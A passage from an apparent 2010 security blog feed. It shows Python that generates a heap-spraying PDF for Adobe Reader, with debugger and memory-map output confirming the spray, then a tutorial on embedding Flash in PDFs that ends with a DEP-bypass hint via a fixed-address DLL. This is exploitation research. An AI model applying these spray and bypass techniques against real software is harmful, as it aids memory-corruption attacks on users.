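def inline_image(data):
    """Wrap raw 8-bit grayscale samples in a one-row PDF inline image."""
    header = b"BI /W %d /H 1 /CS /G /BPC 8 ID " % len(data)
    return header + data + b" EI"


# A 10 pixel image like the one above.
small = inline_image(b"A" * 10)

# Hypothetical spray payload: 0x100 copies of a 0x1000-byte minichunk.
minichunk = b"\x3c" * 4 + b"A" * (0x1000 - 4)
big = inline_image(minichunk * 0x100)

# Roughly what a /FlateDecode filtered content stream would have to store.
packed = zlib.compress(big, 9)
print(len(big), len(packed))
```

<p>The megabyte of image data shrinks to a tiny fraction of its size, because the payload is the same minichunk over and over.</p>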
<p>So <a href="http://pastebin.com/f1749356">here</a> you have the py for generating a memory filling PDF using nothing but inline images.</p>
<p>Create the pdf:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">python PDFSpray.py &gt;PDFSpray.pdf</div>
<p>Run Adobe Reader:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">acroread PDFSpray.pdf</div>
<p>&#8230; get its PID and check its memory footprint:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>ps -eo pid,vsz,cmd -ww --sort=pid |grep acroread
8805 532984K /opt/Adobe/.../bin/acroread PDFSpray.pdf
</pre>
</div>
<p>OK, 500 megabytes! It seems to be working!</p>
<p>Let&#8217;s check out its memory mappings&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:10px;">
<pre>cat /proc/8805/maps |head -n16
08048000-0970b000 r-xp 00000000 08:01 1754759 ../bin/acroread
0970b000-09792000 rwxp 016c2000 08:01 1754759 ../bin/acroread
09792000-097a0000 rwxp 00000000 00:00 0
0985f000-0ba2f000 rwxp 00000000 00:00 0       [heap]
9a35c000-9a35d000 ---p 00000000 00:00 0
9a35d000-9a45d000 rwxp 00000000 00:00 0
9a45d000-9a45e000 ---p 00000000 00:00 0
9a45e000-a745e000 rwxp 00000000 00:00 0
a748c000-ad88c000 rwxp 00000000 00:00 0
adce0000-b40e0000 rwxp 00000000 00:00 0
</pre>
</div>
<p>And in the debugger&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>gdb
GNU gdb (Gentoo 7.0 p1) 7.0
Copyright (C) 2009 Free Software Foundation, Inc.
(gdb) attach 8805
(gdb) x/8x 0xa0000000
0xa0000000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0000010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xa0000000+0x1000*1
0xa0001000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0001010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xa0000000+0x1000*2
0xa0002000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0002010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xa0000000+0x1000*3
0xa0003000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0003010: 0x41414141 0x41414141 0x41414141 0x41414141
</pre>
</div>
<p>Again we have achieved our goal! </p>
<h2> The sizes: </h2>
<p>Here you may compare the sizes of the resulting PDF files&#8230;</p>
<table>
<tbody>
<tr>
<td>File</td>
<td>Size (bytes)</td>
</tr>
<tr>
<td>JSSpray.pdf</td>
<td>800</td>
</tr>
<tr>
<td>PDFSpray.pdf</td>
<td>645050</td>
</tr>
<tr>
<td>SWFSpray.pdf</td>
<td>9477</td>
</tr>
</tbody>
</table>
<h2>The baseline</h2>
<p>To gain perspective here you have the spec of the system where we tried all this&#8230;</p>
<pre>Base memory consumption of an idle acroread::
117056k /opt/Adobe/Reader9/Reader/intellinux/bin/acroread

PaXtest::
Mode: kiddie
Linux localhost 2.6.31-gentoo-r6 #3 SMP Mon Dec 21 08:31:19 ART 2009
i686 Intel(R) Core(TM)2 CPU T5500 @ 1.66GHz GenuineIntel GNU/Linux

Executable anonymous mapping             : Vulnerable
Executable bss                           : Vulnerable
Executable data                          : Vulnerable
Executable heap                          : Vulnerable
Executable stack                         : Vulnerable
Executable anonymous mapping (mprotect)  : Vulnerable
Executable bss (mprotect)                : Vulnerable
Executable data (mprotect)               : Vulnerable
Executable heap (mprotect)               : Vulnerable
Executable stack (mprotect)              : Vulnerable
Executable shared library bss (mprotect) : Vulnerable
Executable shared library data (mprotect): Vulnerable
Writable text segments                   : Vulnerable
Anonymous mapping randomisation test     : 9 bits (guessed)
Heap randomisation test (ET_EXEC)        : 14 bits (guessed)
Heap randomisation test (ET_DYN)         : 16 bits (guessed)
Main executable randomisation (ET_EXEC)  : No randomisation
Main executable randomisation (ET_DYN)   : 8 bits (guessed)
Shared library randomisation test        : 10 bits (guessed)
Stack randomisation test (SEGMEXEC)      : 19 bits (guessed)
Stack randomisation test (PAGEEXEC)      : 19 bits (guessed)
Return to function (strcpy)              : Vulnerable
Return to function (memcpy)              : Vulnerable
Return to function (strcpy, RANDEXEC)    : Vulnerable
Return to function (memcpy, RANDEXEC)    : Vulnerable
Executable shared library bss            : Vulnerable
Executable shared library data           : Vulnerable

</pre>
<h2>Conclusion:</h2>
<p>Yes we can fill it!<br />
There probably are, and always will be, 1000000 ways to fill a browser&#8217;s memory, so it may be a good idea to stop trying to detect the source of the spray and instead try to detect the spray itself. Also bear in mind that the spray may not always contain code; it may contain just pointers for some ret2libc-oriented programming.</p>
<p>You may grab a test bundle with all the code from <a href="http://sites.google.com/site/felipeandresmanzano/fillHeap.tar.gz?attredirects=0&amp;d=1">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/02/15/filling-adobes-heap/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/09/t_small-b.png" medium="image">
			<media:title type="html">Follow feliam on Twitter</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/02/heapdraw1.png?w=300" medium="image">
			<media:title type="html">heapdraw</media:title>
		</media:content>
	</item>
		<item>
		<title>Flash on a PDF with miniPDF.py…</title>
		<link>http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/</link>
		<comments>http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/#comments</comments>
		<pubDate>Thu, 11 Feb 2010 21:45:35 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[swf]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=165</guid>
		<description><![CDATA[Due to the recent advances in exploitation techniques it has become really important to put Flash everywhere we can. Flash AHAHHHHHHHHHHHHHHH!!!! In this post we are going to show how to add a swf(Flash) file to a PDF file using our miniPDF.py lib. Flash support is relatively new in PDF and came onto the scene [...]]]></description>
				<content:encoded><![CDATA[<p>Due to the recent advances in exploitation techniques it has become really important to put Flash everywhere we can.</p>
<table>
<tbody>
<tr>
<td>
<p style="text-align:center;">Flash AHAHHHHHHHHHHHHHHH!!!!</p>
<p>In this post we are going to show how to add a swf(Flash) file to a PDF file  using our miniPDF.py lib.</td>
<td><img src="http://feliam.files.wordpress.com/2010/02/flashlogo1.jpg?w=60&#038;h=60" alt="" width="60" height="60" /></td>
</tr>
</tbody>
</table>
<p>Flash support is relatively new in PDF and came onto the scene primarily to support PDF portable collections and the like. We&#8217;ll follow the steps described in <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000 </a>, so you probably need to grab it and keep it close. In case you&#8217;ve missed the previous posts, here is a copy of <a href="http://pastebin.com/f5f8ee3cd">miniPDF.py</a> so you can take a quick look. We are going to use that lib mainly as we did in earlier posts and keep adding PDF objects until&#8230;  &#8211;FLASH!&#8211; we end up with a one-page PDF with a running embedded SWF. OK, so let&#8217;s start&#8230;<br />
<span id="more-165"></span><br />
First we import the lib and create a PDFDoc object representing a  document in memory &#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>from miniPDF import *  # assumes miniPDF.py sits next to this script
doc = PDFDoc()
</pre>
</div>
<p>&#8230; prepare an empty content stream for the page and add it to the  document.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>contents = PDFStream('')
doc.add(contents)
</pre>
</div>
<p>The minimal page object. We construct it and add it to the document like this&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>page = PDFDict()
page.add("Type", PDFName("Page"))
page.add("Contents", PDFRef(contents))
doc.add(page)
</pre>
</div>
<p>&#8230; then we need the list of pages, in this case containing just our blank page.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>pages = PDFDict()
pages.add("Type", PDFName("Pages"))
pages.add("Kids", PDFArray([PDFRef(page)]))
pages.add("Count", PDFNum(1))
doc.add(pages)
</pre>
</div>
<p>Let&#8217;s be nice and honor the PDF page tree structure: we link the page to its parent.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>page.add("Parent", PDFRef(pages))
</pre>
</div>
<p>And finally we add the catalog, which is the root object of this PDF.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>catalog = PDFDict()
catalog.add("Type", PDFName("Catalog"))
catalog.add("Pages", PDFRef(pages))
doc.add(catalog)
doc.setRoot(catalog)
</pre>
</div>
<p>If we render that like this&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>print doc
</pre>
</div>
<p>we&#8217;ll get a clean minimalistic PDF file with just one blank page.</p>
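<p>To make the mapping between those calls and the file contents more tangible, here is a tiny stand-alone sketch that prints the kind of objects such a document contains. It does not use miniPDF and is not how miniPDF serializes things; pdf_dict, pdf_object and the object numbers are all made up for the illustration.</p>

```python
def pdf_dict(entries):
    """Serialize a mapping of key to already-serialized value as a PDF
    dictionary. Keys become names (/Key); values are emitted verbatim."""
    body = " ".join("/%s %s" % (key, value) for key, value in entries.items())
    return "<< %s >>" % body


def pdf_object(number, body):
    """Wrap a serialized body as indirect object `number`, generation 0."""
    return "%d 0 obj\n%s\nendobj" % (number, body)


# Hypothetical object numbers; a real generator assigns them itself.
page = pdf_object(2, pdf_dict({"Type": "/Page", "Contents": "1 0 R",
                               "Parent": "3 0 R"}))
pages = pdf_object(3, pdf_dict({"Type": "/Pages", "Kids": "[ 2 0 R ]",
                                "Count": "1"}))
catalog = pdf_object(4, pdf_dict({"Type": "/Catalog", "Pages": "3 0 R"}))
print("\n".join([page, pages, catalog]))
```

<p>Each &#8220;N 0 R&#8221; is an indirect reference, which is what a PDFRef stands for in the walkthrough above.</p>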
<table>
<tbody>
<tr>
<td><img src="http://feliam.files.wordpress.com/2010/01/basepdfpdf.png?w=190" alt="" /></td>
<td>Here you have the <a href="http://pastebin.com/f61812150">mkMINIPDF.py</a> python file and the generated <a href="http://feliam.files.wordpress.com/2010/02/mini.pdf">example</a>.</p>
<p style="text-align:center;">-Hey Mom look what I did!! A mini blank PDF file!!! look! look!</p>
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:right;">Not so exciting though.</p>
</td>
</tr>
</tbody>
</table>
<h2>The annotation</h2>
<p>As stated in the <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000 </a>, Flash support in PDF is implemented as a type of annotation; more precisely, the annotation type &#8220;RichMedia&#8221;. So we go back to section 12.5 of the PDF32000 specification and take a look at what an annotation is.</p>
<div style="font-style:italic;font-size:big;background:none repeat scroll 0 0 #fbdfdf;margin:20px;padding:20px;">&#8221;&#8217;An annotation associates an object such as a note, sound, or  movie with a location on a page of a PDF document, or provides a way to interact with the user by means of the  mouse and keyboard. PDF includes a wide variety of standard annotation types.&#8221;&#8217;</div>
<p>So we construct the RichMedia annotation object with all the required  fields &#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>annot = PDFDict()
annot.add('Type',PDFName('Annot'))
annot.add('Subtype',PDFName('RichMedia'))
annot.add('Rect','[ 266 116 430 204 ]')
doc.add(annot)
</pre>
</div>
<p>&#8230; and we add it to our page.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>page.add("Annots", PDFArray([PDFRef(annot)]))
</pre>
</div>
<p>This has nothing to do with Flash yet. If we keep going through the <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000 </a>, TABLE 9.49 lists the extra annotation entries specific to a RichMedia annotation, which are RichMediaSettings and RichMediaContent. So let&#8217;s add those two to the annotation dictionary.</p>
<p>Add an empty RichMediaSettings container to the document..</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMS = PDFDict()
doc.add(RMS)
</pre>
</div>
<p>&#8230; then the same with a RichMediaContent dictionary.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMC = PDFDict()
doc.add(RMC)
</pre>
</div>
<p>Both are empty for now; we add them to the annotation..</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>annot.add('RichMediaSettings', PDFRef(RMS))
annot.add('RichMediaContent', PDFRef(RMC))
</pre>
</div>
<h2>The RichMediaSettings</h2>
<div style="font-style:italic;font-size:big;background:none repeat scroll 0 0 #fbdfdf;margin:20px;padding:20px;">&#8221;&#8217;Annotation described in Section 9.5.1 of the PDF Reference. The  RichMediaSettings dictionary stores the conditions and responses that occur in response to certain events, such  as activation and deactivation of the annotation, and contains two dictionaries.&#8221;&#8217;</div>
<p>For the RichMediaSettings dictionary we need an activation and a deactivation dictionary, which basically tell when the annotation should activate and deactivate&#8230;</p>
<p>First we add the activation dictionary. The &#8216;PO&#8217; condition means  &#8216;when the page containing the annotation is opened&#8217;. There are other  options in the doc.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>activation = PDFDict()
activation.add('Type', PDFName('RichMediaActivation'))
activation.add('Condition', PDFName('PO'))
doc.add(activation)
</pre>
</div>
<p>And the deactivation dictionary. The &#8216;XD&#8217; means &#8216;run until  deactivated by the user&#8217;.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>deactivation = PDFDict()
deactivation.add('Type', PDFName('RichMediaDeactivation'))
deactivation.add('Condition', PDFName('XD'))
doc.add(deactivation)
</pre>
</div>
<p>And then the RichMediaSettings, flagging the annotation as being of type &#8216;Flash&#8217;. Note that we&#8217;ve already constructed and added an empty object representing this a couple of lines before. We just populate it.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMS.add('Type',PDFName('RichMediaSettings'))
RMS.add('Subtype',PDFName('Flash'))
RMS.add('Activation', PDFRef(activation))
RMS.add('Deactivation', PDFRef(deactivation))
</pre>
</div>
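<p>As a quick reference for the &#8216;PO&#8217; and &#8216;XD&#8217; names used above, here is a small lookup of the Condition values as we read them in the Supplement. Treat the wording as our paraphrase and double-check it against the document; the describe helper is made up for the example.</p>

```python
# Condition names as we read them in the Supplement (paraphrased).
ACTIVATION_CONDITIONS = {
    "XA": "activated explicitly by a user action or script",
    "PO": "activated when the page containing the annotation is opened",
    "PV": "activated when any part of that page becomes visible",
}
DEACTIVATION_CONDITIONS = {
    "XD": "deactivated explicitly by a user action or script",
    "PC": "deactivated when the page is closed",
    "PI": "deactivated when the page becomes invisible",
}


def describe(activation, deactivation):
    """Human-readable summary of a pair of Condition names.
    Raises KeyError for a name that is not in the tables above."""
    return "%s; %s" % (ACTIVATION_CONDITIONS[activation],
                       DEACTIVATION_CONDITIONS[deactivation])


print(describe("PO", "XD"))
```

<p>The pair used in this post, PO and XD, starts the Flash as soon as the page is opened and keeps it running until something explicitly deactivates it.</p>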
<h2>The RichMediaContent</h2>
<div style="font-style:italic;font-size:big;background:none repeat scroll 0 0 #fbdfdf;margin:20px;padding:20px;">&#8221;&#8217;The RichMediaContent dictionary contains content that is present  within the annotation as referenced by the RichMediaSettings dictionary. &#8221;&#8217;</div>
<p>For the RichMediaContent dictionary we need at least two things: the assets, a name tree of embedded file specification dictionaries, and a bunch of RichMediaConfiguration dictionaries.</p>
<p>The assets name tree is the one pointing to the files involved, for example our .swf file. An asset name tree has this look:</p>
<pre>29 0 obj
&lt;&lt; /Names    [      (Flash.swf) 31 0 R    ] &gt;&gt;
endobj
</pre>
<p>We take the file embedding functionality from this post and will not treat it here; there is enough PDF madness with the Flash part. The <a href="http://pastebin.com/f40d0434e">_zipEmbeddeFile</a> function takes the document and a filename and returns a filespec object after embedding the file into the PDF doc. We take the Flash filename from the first argument to the python script.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>import sys  # for sys.argv, the SWF filename is the first argument
assets = PDFDict()
swfname = PDFString(sys.argv[1])
efref = PDFRef(_zipEmbeddeFile(doc, sys.argv[1]))
assets.add('Names',PDFArray([swfname, efref]))
doc.add(assets)
</pre>
</div>
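<p>With a single asset the name tree is trivial, but if more files were involved the keys of the Names array would have to be sorted, since that is what name trees require. A stand-alone sketch of that serialization follows; names_array is a made-up helper, it does not use miniPDF, and the references are hypothetical.</p>

```python
def names_array(assets):
    """Serialize {name: reference} as the /Names array of a name tree leaf.
    Keys are sorted because name trees require ordered keys. Names are
    assumed to be plain ASCII without parentheses or backslashes, which
    would need escaping in a PDF literal string."""
    items = []
    for name in sorted(assets):
        items.append("(%s) %s" % (name, assets[name]))
    return "<< /Names [ %s ] >>" % " ".join(items)


print(names_array({"Flash.swf": "31 0 R"}))
```

<p>For our single file this prints the same dictionary as the example object shown earlier.</p>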
<p>Now we need the RichMediaConfiguration dictionaries, which in our case will be just one (see <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000</a>#TABLE 9.51).</p>
<h2>RichMediaConfiguration Dictionary</h2>
<div style="font-style:italic;font-size:big;background:none repeat scroll 0 0 #fbdfdf;margin:20px;padding:20px;">&#8221;&#8217;The RichMediaConfiguration dictionary describes a set of  instances that are loaded for a given scene configuration. The configuration to be loaded when an annotation is  activated is referenced by the Configuration key in the RichMediaActivation dictionary specified in the  RichMediaSettings dictionary.&#8221;&#8217;</div>
<p>But first let&#8217;s declare the instances array we need for the RichMediaConfiguration. We&#8217;ll populate it in a while.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>instances = []
</pre>
</div>
<p>And the actual RichMediaConfiguration.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMCfg = PDFDict()
RMCfg.add('Type',PDFName('RichMediaConfiguration'))
RMCfg.add('Subtype',PDFName('Flash'))
RMCfg.add('Name',PDFString('ElFlash'))
RMCfg.add('Instances', PDFArray(instances))
doc.add(RMCfg)
</pre>
</div>
<p>And now we have most of what is needed for the RichMediaContent, so let&#8217;s fill it in&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMC = PDFDict()
RMC.add('Type', PDFName('RichMediaContent'))
RMC.add('Assets', PDFRef(assets))
RMC.add('Configurations',PDFArray([PDFRef(RMCfg)]))
doc.add(RMC)
</pre>
</div>
<p>But we have left the instances array empty, and erg.. we need it, so..</p>
<h3>RichMediaInstance Dictionary</h3>
<div style="font-style:italic;font-size:big;background:none repeat scroll 0 0 #fbdfdf;margin:20px;padding:20px;">&#8220;The RichMediaInstance dictionary, referenced by the Instances entry of the RichMediaConfiguration dictionary (“RichMediaConfiguration Dictionary” on page 88), describes a single instance of an asset with settings to populate the artwork of an annotation, as described in Table 9.51b.&#8221;</div>
<p>We are basically going to use this to designate which embedded file is the Flash and to pass arguments to it. Yes, we can pass arguments to it!!!</p>
<p>The RichMediaInstances array looks like this:</p>
<pre>15 0 obj                    % RichMediaInstances array
[ 17 0 R ]
endobj
17 0 obj
&lt;&lt; /Type /RichMediaInstance
   /Subtype /Flash
   /Asset 31 0 R
   /Params 18 0 R
&gt;&gt;
endobj
</pre>
<p>And now we put together our only RichMediaInstance dictionary (see <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000</a>, Table 9.51b)&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMI = PDFDict()
RMI.add('Type',PDFName('RichMediaInstance'))
RMI.add('Subtype',PDFName('Flash'))
RMI.add('Asset',efref)
doc.add(RMI)
</pre>
</div>
<p>And add it to the list of instances referenced from the RichMediaConfiguration dict.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>instances.append(PDFRef(RMI))
</pre>
</div>
<p>To pass parameters, we can also add a RichMediaParams dictionary (see <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000</a>, Table 9.51c). We read the parameters from the file named in the second argument passed to the Python script.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMParams = PDFDict()
RMParams.add('Type', PDFName('RichMediaParams'))
RMParams.add('FlashVars', PDFString(open(sys.argv[2]).read()))
RMParams.add('Binding', PDFName('Background'))
doc.add(RMParams)
</pre>
</div>
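<p>The vars file read above should hold whatever string the Flash movie is meant to receive as FlashVars, conventionally URL-encoded <code>name=value</code> pairs joined with ampersands. A minimal sketch of generating such a file follows. The variable names and the <code>write_flashvars</code> helper are made up for the example, and it is written for Python 3 rather than the Python 2 used in the rest of this post.</p>

```python
import os
import tempfile
from urllib.parse import quote, urlencode


def write_flashvars(path, variables):
    """Write URL-encoded name=value pairs to path and return the string."""
    # quote_via=quote encodes spaces as %20 instead of "+".
    encoded = urlencode(variables, quote_via=quote)
    with open(path, "w") as handle:
        handle.write(encoded)
    return encoded


# Hypothetical variables; a list of tuples keeps the order explicit.
target = os.path.join(tempfile.mkdtemp(), "myFlashVarsInAfile.vars")
flashvars = write_flashvars(target, [("title", "hello world"), ("volume", "7")])
print(flashvars)
```

<p>The resulting file can then be passed as the second argument to the script.</p>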
<p>We also need to link the RichMediaParams dictionary from the RichMediaInstance&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMI.add('Params',PDFRef(RMParams))
</pre>
</div>
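<p>To make the pieces built so far easier to picture, here is a small stand-alone sketch that prints roughly what the instance and its parameters look like in raw PDF syntax. It does not use miniPDF: the helper functions and the FlashVars value are invented for illustration, the object numbers are borrowed from the listing shown earlier, and the string escaping covers only backslashes and parentheses.</p>

```python
def pdf_string(text):
    """Render a PDF literal string, escaping backslashes and parentheses."""
    # The backslash must be handled first so later escapes are not doubled.
    for char in ("\\", "(", ")"):
        text = text.replace(char, "\\" + char)
    return "(" + text + ")"


def pdf_dict(entries):
    """Render (key, value) pairs as a one-line PDF dictionary."""
    body = " ".join("/%s %s" % (key, value) for key, value in entries)
    return "<< " + body + " >>"


def pdf_object(number, content):
    """Wrap content as an indirect object with generation number 0."""
    return "%d 0 obj\n%s\nendobj" % (number, content)


# Hypothetical object numbers and FlashVars content.
params = pdf_object(18, pdf_dict([
    ("Type", "/RichMediaParams"),
    ("FlashVars", pdf_string("msg=hi (there)")),
    ("Binding", "/Background"),
]))
instance = pdf_object(17, pdf_dict([
    ("Type", "/RichMediaInstance"),
    ("Subtype", "/Flash"),
    ("Asset", "31 0 R"),
    ("Params", "18 0 R"),
]))
print(instance)
print(params)
```

<p>The instance points at the embedded file and at the params object only through indirect references, which is why each dictionary is added to the doc before it is referenced.</p>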
<p>THAT&#8217;S IT!!! We only need to render the PDF&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>print doc
</pre>
</div>
<p>Uff! Finally! The resulting Python script has <A href="http://pastebin.com/f458bd175">this</A> form, and it runs like this:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:20px;padding:20px;">python mkSWFPDF.py myFlash.swf myFlashVarsInAfile.vars &gt;SWFPDF.pdf</div>
<p>And it works!!! I took an SWF from the web and embedded it; here is the screenshot&#8230;</p>
<p><a href='http://feliam.files.wordpress.com/2010/02/swfpdf.pdf'><img src="http://feliam.files.wordpress.com/2010/02/swfpdf.png?w=460" alt="" /> </a></p>
<p>And <A href="http://sites.google.com/site/felipeandresmanzano/swfPDF.tar.gz">HERE</A> you have the test bundle with all this.</p>
<p>Untested and related: in my tests, authplay.dll, the DLL providing all the Flash functionality to Adobe Reader, is loaded at a fixed address on XPSPx, both inside IE and standalone, which means you can bypass DEP through some ret2authplay.dll. Also, when running standalone, the Reader doesn&#8217;t opt in to DEP.</p>
<p>f/<!--more--></p>
]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/02/flashlogo1.jpg" medium="image" />

		<media:content url="http://feliam.files.wordpress.com/2010/01/basepdfpdf.png?w=190" medium="image" />

		<media:content url="http://feliam.files.wordpress.com/2010/02/swfpdf.png" medium="image" />
	</item>
	</channel>
</rss>
